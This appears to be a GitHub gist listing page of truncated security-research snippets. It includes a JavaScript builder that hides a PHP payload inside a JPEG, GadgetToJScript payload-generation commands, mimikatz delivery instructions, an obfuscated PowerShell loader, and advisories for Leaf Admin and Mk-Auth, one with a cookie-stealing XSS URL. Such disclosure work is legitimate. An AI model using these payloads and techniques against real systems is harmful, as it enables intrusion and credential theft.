This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var wpnonce = ''; | |
var ajaxnonce = ''; | |
var wp_attached_file = ''; | |
var imgurl = ''; | |
var postajaxdata = ''; | |
var post_id = 0; | |
var cmd = '<?php phpinfo();/*'; | |
var cmdlen = cmd.length | |
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9'; | |
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[Suggested description] | |
The profile photo upload feature in Leaf Admin 61.9.0212.10 f allows | |
Unrestricted Upload of a File with a Dangerous Type. | |
------------------------------------------ | |
[Additional Information] | |
Leaf Admin is a virtual appliance running a web application used to | |
manage Internet Service Providers (ISP). It controls which users are | |
enabled or disabled on the system (due to payment issues), connection |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Command to generate HTA code using GadgetsToJScript | |
GadgetToJScript.exe -w hta | |
# Command to generate JS code using GadgetsToJScript | |
GadgetToJScript.exe -w js | |
# Command to generate VBS code using GadgetsToJScript | |
GadgetToJScript.exe -w vbs | |
# Command to generate VBA code using GadgetsToJScript |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import argparse | |
class Decrypter: | |
SIMPLE_STRING = "0123456789ABCDEF" | |
SIMPLE_MAGIC = 0xA3 | |
def __init__(self, password): | |
self.data = password | |
def next(self): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
It is basically a wrap of the following projects: | |
- mimikatz (https://github.com/gentilkiwi/mimikatz) | |
- mimikatz in .NET by Casey Smith (https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7) | |
Updated from 2.0.0 to 2.1.1 (https://gist.github.com/pljoel/410eeebcaf118b9ac8b8f2b40fd5e863) | |
- DotNetToJScript (https://github.com/tyranid/DotNetToJScript) | |
INSTRUCTIONS: | |
1. Grab the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases | |
2. a) Uncomment the building lines from Casey's project in Delivery.Program.Main() (You may want to comment the Exec() line though) | |
b) It is going to produce a file.b64, so copy it's content and replace Delivery.Package.file string by it |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Product Description: | |
Mk-Auth is a Brazilian Management System for Internet Service Providers used to control client access and permissions via a web interface panel. | |
Vulnerability Description: | |
It is possible to leak other user’s sensitive information like CPF (Personal Number used in Brazil) by manipulating the number of the invoice requested. | |
Additional Information: | |
Any authenticated user can read arbitrary invoices even if it does not belong to the authenticated user. The response leaks sensitive information of the user that the invoice refers to. See below an example of a GET request: | |
GET /central/recibo.php?titulo=00006 HTTP/1.1 | |
Vulnerability Type: | |
CWE-639: Authorization Bypass Through User-Controlled Key |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Mk-Auth User Impersonation Via Reflected XSS and Unprotected Session Cookie | |
Product Description: | |
Mk-Auth is a Brazilian Management System for Internet Service Providers used to control client access and permissions via a web interface panel. | |
Vulnerability Description: | |
It is possible to steal and reuse an admin session token by abusing a reflected XSS and an unprotected cookie. | |
Additional Information: | |
The session token (centralmka2) does not have the HTTPOnly flag set what allows a javascript code to read its content. In addition to that, the parameter “registro” of the “logs_ajax.php” page is vulnerable to reflected XSS which allows an attacker to take advantage of the misconfigured cookie. See below an example of a malicious request: | |
http://<mkserver>/admin/logs_ajax.php?registro=0&tipo=todos%27%3balert(document.cookie)%2f%2f | |
Vulnerability Type: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Mk-Auth CSRF in Clients Change Password Form | |
Product Description: | |
Mk-Auth is a Brazilian Management System for Internet Service Providers used to control client access and permissions via a web interface panel. | |
Vulnerability Description: | |
It is possible to change a user’s password by enticing a logged user to access a malicious webpage. | |
Additional Information: | |
A malicious actor may craft a web page that, when a user that is authenticated on Mk-Auth (on “central” module), access the page, the user’s password is automatically replaced by one chosen by the attacker. | |
PoC: | |
<html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function sandbanks { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Position = 0)] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ModuleName = [Guid]::NewGuid().ToString() | |
) | |
$tzXzjieG99 = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($null, @()) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
//#include "dllmain.h" | |
import "C" |
OlderNewer